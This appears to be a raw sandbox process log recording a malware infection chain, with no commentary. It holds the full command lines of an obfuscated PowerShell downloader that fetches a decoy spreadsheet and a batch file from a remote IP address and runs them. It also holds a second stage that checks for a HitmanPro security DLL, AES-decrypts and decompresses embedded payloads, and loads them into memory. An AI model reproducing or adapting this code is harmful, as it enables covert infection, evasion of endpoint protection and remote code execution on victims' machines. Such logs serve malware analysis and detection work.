powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kipZYBt($xmlqoFv, $xxsHcHd){[IO.File]::WriteAllBytes($xmlqoFv, $xxsHcHd)};function NPYJHZhbRkH($xmlqoFv){if($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79358,79366,79366))) -eq $True){rundll32.exe $xmlqoFv }elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79370,79373,79307))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $xmlqoFv}elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79367,79373,79363))) -eq $True){misexec /qn /i $xmlqoFv}else{Start-Process $xmlqoFv}};function skhhUWSRQRcMVVBi($zlBKZfgSrbR){$PwsxJOpZzZHAXU = New-Object (pUumXNaJPCwzbRJPTm @(79336,79359,79374,79304,79345,79359,79356,79325,79366,79363,79359,79368,79374));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$xxsHcHd = $PwsxJOpZzZHAXU.DownloadData($zlBKZfgSrbR);return $xxsHcHd};function pUumXNaJPCwzbRJPTm($FwJhDg){$bytRYOIMN=79258;$DOqsFCU=$Null;foreach($YTSyfwBIrldqUiXl in $FwJhDg){$DOqsFCU+=[char]($YTSyfwBIrldqUiXl-$bytRYOIMN)};return $DOqsFCU};function nvpRDaZuFdMv(){$LQHSRlYpPFAf = $env:AppData + '\';$OKCfUavrMyur = $LQHSRlYpPFAf + '111.xlsx';If(Test-Path -Path $OKCfUavrMyur){Invoke-Item $OKCfUavrMyur;}Else{ $USAlJnkhPi = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79307,79307,79307,79304,79378,79366,79373,79378));kipZYBt $OKCfUavrMyur $USAlJnkhPi;Invoke-Item $OKCfUavrMyur;};$wYVYeSi = $LQHSRlYpPFAf + 'xD.bat'; if (Test-Path -Path $wYVYeSi){NPYJHZhbRkH $wYVYeSi;}Else{ $dKcnJdV = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79378,79326,79304,79356,79355,79374));kipZYBt $wYVYeSi $dKcnJdV;NPYJHZhbRkH $wYVYeSi;};;;;}nvpRDaZuFdMv;
2668EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
2836cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "
1356powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2164explorer.exe C:\Windows\Explorer.EXE
1452